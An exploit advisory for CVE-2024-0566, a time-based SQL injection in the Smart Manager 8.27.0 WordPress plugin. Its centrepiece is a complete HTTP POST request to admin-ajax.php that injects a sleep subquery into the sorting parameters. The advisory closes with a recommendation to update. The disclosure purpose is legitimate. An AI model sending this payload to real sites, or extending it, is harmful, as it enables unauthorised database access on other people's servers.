
# CVE-2024-0566 Smart Manager 8.27.0 - Post-Authenticated SQL Injection

**Exploit Title:** Smart Manager 8.27.0 - Post-Authenticated SQL Injection  
**Date:** 2024-01-18  
**Exploit Author:** Ivan Spiridonov - xbz0n  
**Vendor Homepage:** https://www.storeapps.org/    
**Software Link:** https://www.storeapps.org/product/smart-manager/  
**Version:** 8.27.0  
**Tested on:** Ubuntu 22.04  
**CVE:** CVE-2024-0566

## SQL Injection

The plugin does not properly sanitize and escape a parameter before using it in an SQL statement, leading to an SQL injection exploitable by high-privilege users such as admin.

## Affected Components

- **Plugin:** Smart Manager
- **Version:** 8.27.0
- **Affected Parameters:** 'sort_params%5BsortOrder%5D', 'sort_params%5Bcolumn%5D'
- **Affected Endpoint:** /wp-admin/admin-ajax.php

## Description

The vulnerability is located within the admin AJAX endpoint in the sorting parameters 'sort_params%5BsortOrder%5D' and 'sort_params%5Bcolumn%5D'. By manipulating these parameters, authenticated attackers can inject SQL commands, leading to a time-based SQL Injection vulnerability.

## Proof of Concept

### Manual Exploitation

```http
POST /wp-admin/admin-ajax.php?action=sm_beta_include_file HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://localhost/wp-admin/admin.php?page=smart-manager
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1117
Origin: http://localhost
Connection: close
Cookie: Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
cmd=get_data_model&active_module=product&security=37e8d818b7&is_public=1&sm_page=1&sm_limit=50&SM_IS_WOO30=true&sort_params%5Bcolumn%5D=postmeta%2Fmeta_key%3D_tax_status%2Fmeta_value%3D_tax_status&sort_params%5BsortOrder%5D=asc%2c(select*from(select(sleep(20)))a)&table_model%5Bposts%5D%5Bpkey%5D=ID&table_model%5Bposts%5D%5Bjoin_on%5D=&table_model%5Bposts%5D%5Bwhere%5D%5Bpost_type%5D%5B%5D=product&table_model%5Bposts%5D%5Bwhere%5D%5Bpost_type%5D%5B%5D=product_variation&table_model%5Bposts%5D%5Bwhere%5D%5Bpost_status%5D=any&table_model%5Bpostmeta%5D%5Bpkey%5D=post_id&table_model%5Bpostmeta%5D%5Bjoin_on%5D=postmeta.post_ID+%3D+posts.ID&table_model%5Bterm_relationships%5D%5Bpkey%5D=object_id&table_model%5Bterm_relationships%5D%5Bjoin_on%5D=term_relationships.object_id+%3D+posts.ID&table_model%5Bterm_taxonomy%5D%5Bpkey%5D=term_taxonomy_id&table_model%5Bterm_taxonomy%5D%5Bjoin_on%5D=term_taxonomy.term_taxonomy_id+%3D+term_relationships.term_taxonomy_id&table_model%5Bterms%5D%5Bpkey%5D=term_id&table_model%5Bterms%5D%5Bjoin_on%5D=terms.term_id+%3D+term_taxonomy.term_id&search_text=&advanced_search_query=%5B%5D&is_view=0&isTasks=0&is_taxonomy=0
```

If the server response is delayed by approximately 20 seconds, it indicates a successful exploitation of the time-based SQL Injection, confirming the vulnerability.

## Recommendations

Users of Smart Manager v8.27.0 are strongly advised to restrict access to the affected endpoint and update the plugin to the latest version. 
